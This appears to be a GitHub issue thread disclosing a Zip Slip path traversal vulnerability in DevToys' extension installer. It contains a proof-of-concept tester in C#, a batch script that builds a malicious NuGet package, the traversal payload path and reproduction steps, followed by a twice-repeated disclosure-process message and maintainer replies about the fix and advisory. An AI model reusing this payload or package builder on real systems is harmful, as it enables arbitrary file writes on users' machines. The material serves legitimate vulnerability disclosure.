               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("File written to: " + targetFile);
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("File contents:");
               Console.WriteLine("-------------------------------------------------------------");
               Console.ResetColor();

               try
               {
                   Console.WriteLine(File.ReadAllText(targetFile));
               }
               catch (Exception ex)
               {
                   Console.WriteLine("Error reading file: " + ex.Message);
               }

               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("-------------------------------------------------------------");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("* Arbitrary file write confirmed outside plugin directory");
               Console.WriteLine("* Path traversal bypassed security checks");
               Console.WriteLine("* CVE-001 successfully demonstrated");
               Console.ResetColor();
           }

           Console.WriteLine();
           Console.ForegroundColor = ConsoleColor.Cyan;
           Console.WriteLine("Additional check locations:");
           Console.ResetColor();
           Console.WriteLine("- " + tempFile);

           if (File.Exists(tempFile))
           {
               vulnerabilityFound = true;
               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("  [!] FOUND: Alternative payload location");
               Console.ResetColor();
           }

           string devToysPlugins = Path.Combine(
               Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
               "DevToys", "Plugins"
           );

           if (Directory.Exists(devToysPlugins))
           {
               Console.WriteLine("- " + devToysPlugins);

               try
               {
                   foreach (var file in Directory.GetFiles(devToysPlugins, "*.txt", SearchOption.AllDirectories))
                   {
                       if (file.Contains("PWNED") || file.Contains("ZIPSLIP"))
                       {
                           vulnerabilityFound = true;
                           Console.ForegroundColor = ConsoleColor.Red;
                           Console.WriteLine("  [!] FOUND: " + file);
                           Console.ResetColor();
                       }
                   }
               }
               catch (Exception ex)
               {
                   Console.WriteLine("  [!] Error scanning: " + ex.Message);
               }
           }

           if (!vulnerabilityFound)
           {
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("[OK] Vulnerability NOT exploited (file not found)");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("This could mean:");
               Console.WriteLine("- The vulnerability has been patched");
               Console.WriteLine("- DevToys version is not vulnerable");
               Console.WriteLine("- Extension installation failed");
               Console.WriteLine("- You have not installed the malicious package yet");
               Console.WriteLine("- Package path traversal was blocked");
               Console.ResetColor();
               Console.WriteLine();
               Console.WriteLine("To test the vulnerability:");
               Console.WriteLine("1. Run BuildMaliciousPackage.exe first");
               Console.WriteLine("2. Install the generated .nupkg in DevToys");
               Console.WriteLine("3. Run this tester again");
           }

           Console.WriteLine();
           Console.ForegroundColor = ConsoleColor.Cyan;
           Console.WriteLine("===============================================================");
           Console.ResetColor();
           Console.WriteLine();

           if (vulnerabilityFound)
           {
               Console.WriteLine("Would you like to clean up the PoC files? (y/n)");
               var key = Console.ReadKey();
               Console.WriteLine();

               if (key.KeyChar == 'y' || key.KeyChar == 'Y')
               {
                   CleanupPoC(targetFile, tempFile);
               }
           }

           Console.WriteLine("Press any key to exit...");
           Console.ReadKey();
       }

       static void CleanupPoC(string targetFile, string tempFile)
       {
           Console.WriteLine();
           Console.ForegroundColor = ConsoleColor.Yellow;
           Console.WriteLine("[*] Cleaning up PoC evidence...");
           Console.ResetColor();

           try
           {
               if (File.Exists(targetFile))
               {
                   File.Delete(targetFile);
                   Console.WriteLine("[OK] Deleted: " + targetFile);
               }

               if (File.Exists(tempFile))
               {
                   File.Delete(tempFile);
                   Console.WriteLine("[OK] Deleted: " + tempFile);
               }

               string buildDir = Path.Combine(Directory.GetCurrentDirectory(), "MaliciousPackage");
               if (Directory.Exists(buildDir))
               {
                   Directory.Delete(buildDir, true);
                   Console.WriteLine("[OK] Deleted: " + buildDir);
               }

               string packageFile = Path.Combine(Directory.GetCurrentDirectory(), "DevToys.PoC.ZipSlip.1.0.0.nupkg");
               if (File.Exists(packageFile))
               {
                   File.Delete(packageFile);
                   Console.WriteLine("[OK] Deleted: " + packageFile);
               }

               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("[OK] Cleanup complete");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("NOTE: You should also uninstall the extension from DevToys:");
               Console.WriteLine("- Open DevToys > Extensions Manager");
               Console.WriteLine("- Find DevToys.PoC.ZipSlip");
               Console.WriteLine("- Click Uninstall");
               Console.ResetColor();
           }
           catch (Exception ex)
           {
               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("[ERROR] Cleanup error: " + ex.Message);
               Console.ResetColor();
           }
       }
   }
}

REM ================================================================================
REM   DEVTOYS ZIP SLIP VULNERABILITY (CVE-001) - PROOF OF CONCEPT
REM ================================================================================
REM
REM   FILE: Updated compile_and_run.bat
REM   PURPOSE: Compiles and runs the Zip Slip proof-of-concept programs
REM   VERSION: 1.0
REM   DATE: 2026-01-07
REM   Author: Asif Nadaf (postasif@protonmail.com)
REM ================================================================================
REM   CRITICAL SECURITY DISCLAIMER - READ BEFORE USE
REM ================================================================================
REM
REM   THIS CODE IS PROVIDED FOR AUTHORIZED SECURITY RESEARCH AND DEFENSIVE
REM   PURPOSES ONLY. UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL.
REM
REM   AUTHORIZED USES:
REM   - Security research in isolated test environments
REM   - Vulnerability validation by DevToys maintainers
REM   - Educational purposes in controlled academic settings
REM   - Penetration testing with explicit written authorization
REM   - Defensive security analysis and patch development
REM
REM   PROHIBITED USES:
REM   - Unauthorized access to computer systems
REM   - Malicious exploitation or attacks
REM   - Testing on systems without explicit permission
REM   - Distribution of weaponized malware
REM   - Any illegal activities or violation of laws
REM
REM ================================================================================
REM   LEGAL NOTICE
REM ================================================================================
REM
REM   Unauthorized computer access is illegal under:
REM   - Computer Fraud and Abuse Act (CFAA) - 18 U.S.C. 1030 (United States)
REM   - Computer Misuse Act 1990 (United Kingdom)
REM   - Similar legislation in other jurisdictions
REM
REM   Violation of these laws can result in:
REM   - Criminal prosecution
REM   - Civil liability
REM   - Imprisonment
REM   - Substantial fines
REM
REM ================================================================================
REM   RESPONSIBLE DISCLOSURE
REM ================================================================================
REM
REM   This proof-of-concept is part of coordinated vulnerability disclosure to:
REM   1. Enable DevToys maintainers to develop and deploy patches
REM   2. Protect DevToys users from potential exploitation
REM   3. Improve security awareness in the developer tools ecosystem
REM
REM   DO NOT:
REM   - Publicly disclose exploitation details before patch release
REM   - Share malicious packages outside authorized research contexts
REM   - Weaponize or enhance this code for malicious purposes
REM
REM ================================================================================
REM   USAGE REQUIREMENTS
REM ================================================================================
REM
REM   Before using this code, you must:
REM   1. Have explicit authorization from system owners
REM   2. Use only in isolated test environments (VMs, sandboxes)
REM   3. Understand the security implications
REM   4. Comply with all applicable laws and regulations
REM   5. Follow professional ethical standards
REM
REM   This code creates a REAL exploit for a REAL vulnerability.
REM   Misuse can cause harm and is YOUR responsibility.
REM
REM ================================================================================
REM   DISCLAIMER OF LIABILITY
REM ================================================================================
REM
REM   THE AUTHORS AND CONTRIBUTORS PROVIDE THIS CODE "AS IS" WITHOUT WARRANTY
REM   OF ANY KIND. THE AUTHORS ASSUME NO LIABILITY FOR ANY DAMAGES, LOSSES, OR
REM   LEGAL CONSEQUENCES ARISING FROM THE USE OR MISUSE OF THIS CODE.
REM
REM   BY USING THIS CODE, YOU AGREE TO ACCEPT FULL RESPONSIBILITY FOR YOUR
REM   ACTIONS AND ACKNOWLEDGE THAT YOU UNDERSTAND THE LEGAL AND ETHICAL
REM   IMPLICATIONS.
REM
REM ================================================================================
REM
REM   Program: Compile and Run
REM   Description: Batch script that compiles C# PoC files with proper assembly
REM                references and executes the malicious package builder.
REM
REM   ASCII VERSION: No unicode characters - fully compatible with all systems
REM
REM ================================================================================

  @echo off
  echo ===============================================================
  echo   COMPILING CVE-001 ZIP SLIP POC
  echo ===============================================================
  echo.

  REM Find C# compiler
  set CSC=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

  if not exist "%CSC%" (
      echo Error: C# compiler not found at %CSC%
      echo Trying 32-bit version...
      set CSC=C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  )

  if not exist "%CSC%" (
      echo Error: C# compiler not found
      echo Please install .NET Framework 4.0 or later
      pause
      exit /b 1
  )

  echo Using compiler: %CSC%
  echo.

  echo [*] Compiling BuildMaliciousPackage.exe...
  "%CSC%" /out:BuildMaliciousPackage.exe /nologo /r:System.IO.Compression.dll /r:System.IO.Compression.FileSystem.dll BuildMaliciousPackage.cs

  if errorlevel 1 (
      echo [X] Compilation failed for BuildMaliciousPackage.exe
      pause
      exit /b 1
  )

  echo [*] Compiling TestZipSlipExploit.exe...
  "%CSC%" /out:TestZipSlipExploit.exe /nologo TestZipSlipExploit.cs

  if errorlevel 1 (
      echo [X] Compilation failed for TestZipSlipExploit.exe
      pause
      exit /b 1
  )

  echo.
  echo [OK] Compilation successful!
  echo.
  echo ===============================================================
  echo   COMPILED PROGRAMS:
  echo ===============================================================
  echo   1. BuildMaliciousPackage.exe - Creates the malicious NuGet package
  echo   2. TestZipSlipExploit.exe    - Verifies if exploit worked
  echo.
  echo ===============================================================
  echo.
  pause

  REM Auto-run the builder
  echo Running BuildMaliciousPackage.exe...
  echo.
  BuildMaliciousPackage.exe

Technical Validation

For CVE reviewers to verify the root cause:

// Vulnerable Code: ExtensionInstallationManager.cs:115
Path.Combine(extensionInstallationPath, packagedFile)

// Plugin installation path on Windows:
// C:\Users\[user]\AppData\Local\DevToys\Plugins\DevToys.PoC.ZipSlip\

// When packagedFile = "../../../../../Documents/PWNED_BY_ZIPSLIP.txt"
// Path.Combine result:
// "C:\Users\[user]\AppData\Local\DevToys\Plugins\DevToys.PoC.ZipSlip\..\..\..\..\..\Documents\PWNED_BY_ZIPSLIP.txt"

// After Windows path normalization (Path.GetFullPath):
// "C:\Users\[user]\Documents\PWNED_BY_ZIPSLIP.txt" <- OUTSIDE PLUGIN DIRECTORY!

// Path traversal breakdown (5 levels required):
//   ../ (1) -> exit extension folder -> Plugins\
//   ../../ (2) -> exit Plugins folder -> DevToys\
//   ../../../ (3) -> exit DevToys folder -> Local\
//   ../../../../ (4) -> exit Local folder -> AppData\
//   ../../../../../ (5) -> exit AppData folder -> User Home (C:\Users\[user]\)
//   Then: Documents\ -> Target: C:\Users\[user]\Documents\

Proof the vulnerability exists:

1. No Path.GetFullPath() validation
2. No StartsWith() check after path combination
3. No rejection of ".." sequences
4. pathToExclude only filters runtime folders, not traversal sequences
5. Allows 5-level traversal from plugin directory to user home directory

---

Minimal Proof-of-Concept (No Compilation Required)

If you have the pre-built DevToys.PoC.ZipSlip.1.0.0.nupkg:

3-Step Reproduction:

1. Check: dir "%USERPROFILE%\Documents\PWNED_BY_ZIPSLIP.txt" -> Should not exist
2. Install: DevToys -> Extensions -> Install Extension -> Select .nupkg
3. Verify: type "%USERPROFILE%\Documents\PWNED_BY_ZIPSLIP.txt" -> File exists = VULNERABLE

Total time: ~2 minutes

DevToys_PoC_SourceCode_exes_Package.zip

[lihnucs]

Hello Etinene and Benjamin, Thank you for the exceptionally rapid response to the critical path traversal vulnerability. I can see that PR #1643 was merged within hours of my report - this demonstrates outstanding commitment to user security. However, I must raise an urgent security disclosure concern that needs immediate attention: Critical Issue: Public 0-Day Disclosure Issue #1641 was filed publicly through the standard bug tracker, which means: 1. Complete vulnerability details (CVSS 9.8, CWE-22) were immediately visible to all GitHub users 2. Working proof-of-concept code with full exploitation instructions was publicly accessible 3. Video demonstration of the exploit was published before a patch was available 4. This created a 0-day vulnerability window where malicious actors could exploit all DevToys users Timeline: - 10:22 AM - Vulnerability disclosed publicly (Issue #1641) - Same day - PR #1643 merged with fixes - 0-day window - Several hours where vulnerability was public knowledge but unpatched While your team's rapid fix deployment was commendable, the public disclosure method violated industry-standard responsible disclosure protocols and potentially exposed thousands of DevToys users to immediate exploitation risk. Why This Matters DevToys users are developers and system administrators with access to: - Production infrastructure and credentials - Source code repositories - CI/CD pipelines - Sensitive client data A publicly disclosed 0-day vulnerability in developer tools is a critical supply chain security incident. Even a few hours of exposure can result in: - Automated exploitation by threat actors monitoring GitHub security issues - Mass compromise of developer workstations - Supply chain attacks affecting downstream software Recommended: GitHub Security Advisory Setup To prevent this from happening again, I strongly recommend establishing GitHub's Security Advisory feature: Benefits: - Private reporting channel for security researchers - Coordinated disclosure timeline before public details are released - Automated CVE assignment through GitHub as a CVE Numbering Authority (CNA) - Security.txt compliance for responsible disclosure - Embargo management until patches are deployed Setup: Repository Settings → Security & Analysis → Enable Security Advisories I've attached a screenshot showing the configuration. This is now standard practice for all major open-source projects handling security vulnerabilities. CVE Assignment Request Immediate Action Required: Since this vulnerability was: - Publicly disclosed on 2026-01-08 - Affects all DevToys 2.0.x versions (including v2.0.8.0) - Rated CVSS 9.8 CRITICAL - Has confirmed exploitation (video proof-of-concept) A CVE identifier must be assigned immediately to: 1. Alert enterprise security teams to patch urgently 2. Enable vulnerability scanners to detect affected installations 3. Document the incident for security compliance requirements 4. Prevent further exploitation through security advisory notifications My Question: As GitHub is a CVE Numbering Authority (CNA), will you be requesting the CVE assignment through GitHub Security Advisory? If you prefer that I request it directly through MITRE or NVD, please confirm and I will proceed. Additional Vulnerabilities - Private Disclosure Request I have identified several additional security vulnerabilities in DevToys that require responsible disclosure. I will NOT repeat the public disclosure mistake. Request: Please provide a private security reporting channel for these findings: - GitHub Security Advisory (preferred) - Private email to security team - Encrypted communication channel I will wait for your guidance before disclosing these additional issues to ensure proper coordinated disclosure. Lessons Learned & Path Forward I understand that mistakes happen, and your rapid response shows genuine commitment to security. Moving forward: 1. Immediate: Establish GitHub Security Advisory 2. Short-term: Assign CVE for current vulnerability (PR #1643) 3. Ongoing: Private disclosure channel for future vulnerabilities 4. Long-term: Security disclosure policy documented in SECURITY.md I'm committed to helping improve DevToys security through responsible, coordinated disclosure. Please let me know: - Will you request the CVE, or should I? - What is the preferred private channel for additional vulnerability reports? - Can we establish a coordinated disclosure timeline for future issues? Thank you for your attention to this critical matter. Despite the disclosure process concerns, I appreciate your swift action to protect DevToys users. Best regards, Asif Nadaf Security Researcher ***@***.***

…

--- Attachments: - GitHub Security Advisory setup screenshot - CVE submission documentation (available upon request)

--- P.S. - I acknowledge my role in the public disclosure and take responsibility for not using a private channel. My intent was to report responsibly, but I should have sought a security-specific contact first. Let's work together to establish proper protocols for the future.

On Thursday, January 8th, 2026 at 1:24 PM, Etienne Baudoux ***@***.***> wrote: Closed [#1641](#1641) as completed via [#1643](#1643). — Reply to this email directly, [view it on GitHub](#1641 (comment)), or [unsubscribe](https://github.com/notifications/unsubscribe-auth/B2OD4QRV4GVKTZOE6GU2WLL4F3DHZAVCNFSM6AAAAACRBRBLVGVHI2DSMVQWIX3LMV45UABCJFZXG5LFIV3GK3TUJZXXI2LGNFRWC5DJN5XDWMRRHEZTGMJZHE4TIMY). You are receiving this because you authored the thread.Message ID: ***@***.***>

[lihnucs]

Hello Etinene and Benjamin, Thank you for the exceptionally rapid response to the critical path traversal vulnerability. I can see that PR #1643 was merged within hours of my report - this demonstrates outstanding commitment to user security. However, I must raise an urgent security disclosure concern that needs immediate attention: Critical Issue: Public 0-Day Disclosure Issue #1641 was filed publicly through the standard bug tracker, which means: 1. Complete vulnerability details (CVSS 9.8, CWE-22) were immediately visible to all GitHub users 2. Working proof-of-concept code with full exploitation instructions was publicly accessible 3. Video demonstration of the exploit was published before a patch was available 4. This created a 0-day vulnerability window where malicious actors could exploit all DevToys users Timeline: - 10:22 AM - Vulnerability disclosed publicly (Issue #1641) - Same day - PR #1643 merged with fixes - 0-day window - Several hours where vulnerability was public knowledge but unpatched While your team's rapid fix deployment was commendable, the public disclosure method violated industry-standard responsible disclosure protocols and potentially exposed thousands of DevToys users to immediate exploitation risk. Why This Matters DevToys users are developers and system administrators with access to: - Production infrastructure and credentials - Source code repositories - CI/CD pipelines - Sensitive client data A publicly disclosed 0-day vulnerability in developer tools is a critical supply chain security incident. Even a few hours of exposure can result in: - Automated exploitation by threat actors monitoring GitHub security issues - Mass compromise of developer workstations - Supply chain attacks affecting downstream software Recommended: GitHub Security Advisory Setup To prevent this from happening again, I strongly recommend establishing GitHub's Security Advisory feature: Benefits: - Private reporting channel for security researchers - Coordinated disclosure timeline before public details are released - Automated CVE assignment through GitHub as a CVE Numbering Authority (CNA) - Security.txt compliance for responsible disclosure - Embargo management until patches are deployed Setup: Repository Settings → Security & Analysis → Enable Security Advisories I've attached a screenshot showing the configuration and the link which needs to be setup: https://github.com/DevToys-app/DevToys/security. This is now standard practice for all major open-source projects handling security vulnerabilities. CVE Assignment Request Immediate Action Required: Since this vulnerability was: - Publicly disclosed on 2026-01-08 - Affects all DevToys 2.0.x versions (including v2.0.8.0) - Rated CVSS 9.8 CRITICAL - Has confirmed exploitation (video proof-of-concept) A CVE identifier must be assigned immediately to: 1. Alert enterprise security teams to patch urgently 2. Enable vulnerability scanners to detect affected installations 3. Document the incident for security compliance requirements 4. Prevent further exploitation through security advisory notifications My Question: As GitHub is a CVE Numbering Authority (CNA), will you be requesting the CVE assignment through GitHub Security Advisory? If you prefer that I request it directly through MITRE or NVD, please confirm and I will proceed. Additional Vulnerabilities - Private Disclosure Request I have identified several additional security vulnerabilities in DevToys that require responsible disclosure. I will NOT repeat the public disclosure mistake. Request: Please provide a private security reporting channel for these findings: - GitHub Security Advisory (preferred) - Private email to security team - Encrypted communication channel I will wait for your guidance before disclosing these additional issues to ensure proper coordinated disclosure. Lessons Learned & Path Forward I understand that mistakes happen, and your rapid response shows genuine commitment to security. Moving forward: 1. Immediate: Establish GitHub Security Advisory 2. Short-term: Assign CVE for current vulnerability (PR #1643) 3. Ongoing: Private disclosure channel for future vulnerabilities 4. Long-term: Security disclosure policy documented in SECURITY.md I'm committed to helping improve DevToys security through responsible, coordinated disclosure. Please let me know: - Will you request the CVE, or should I? - What is the preferred private channel for additional vulnerability reports? - Can we establish a coordinated disclosure timeline for future issues? Thank you for your attention to this critical matter. Despite the disclosure process concerns, I appreciate your swift action to protect DevToys users. Best regards, Asif Nadaf Security Researcher ***@***.***

…

--- Attachments: - GitHub Security Advisory setup screenshot - CVE submission documentation (available upon request)

--- P.S. - I acknowledge my role in the public disclosure and take responsibility for not using a private channel. My intent was to report responsibly, but I should have sought a security-specific contact first. Let's work together to establish proper protocols for the future.

[veler]

Hello,
Thanks for your update @lihnucs . We are working on the CVE. I was waiting to get a new version of DevToys ready to publish, so we can indicate people which version has the fix.

Now that the fix got merged, I'm working on building binaries that contain the patch. I expect it to be ready in a few hours from now.
Thanks for your patience and your help!

[veler]

CVE is here: GHSA-ggxr-h6fm-p2qh